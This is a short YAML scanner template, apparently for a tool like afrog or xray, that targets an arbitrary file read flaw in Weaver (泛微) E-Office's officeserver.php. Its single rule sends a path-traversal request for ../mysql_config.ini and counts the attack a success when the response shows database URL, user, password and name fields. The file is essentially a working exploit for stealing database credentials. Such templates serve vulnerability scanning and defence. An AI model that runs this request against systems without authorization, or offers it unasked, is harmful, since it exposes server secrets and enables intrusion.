id: e-cology-e-office-officeserver-file-read

info:
  name: 泛微OA E-Office officeserver.php 任意文件读取漏洞
  author: zan8in
  severity: critical
  description: |
    泛微OA E-Office officeserver.php文件存在任意文件读取漏洞，攻击者通过漏洞可以下载服务器上的任意文件
    app="泛微-EOffice"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20officeserver.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html

rules:
  r0:
    request:
      method: GET
      path: /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
    expression: response.status == 200 && response.body.bcontains(b'dataurl') && response.body.bcontains(b'datauser') && response.body.bcontains(b'datapassword') && response.body.bcontains(b'dataname')
expression: r0()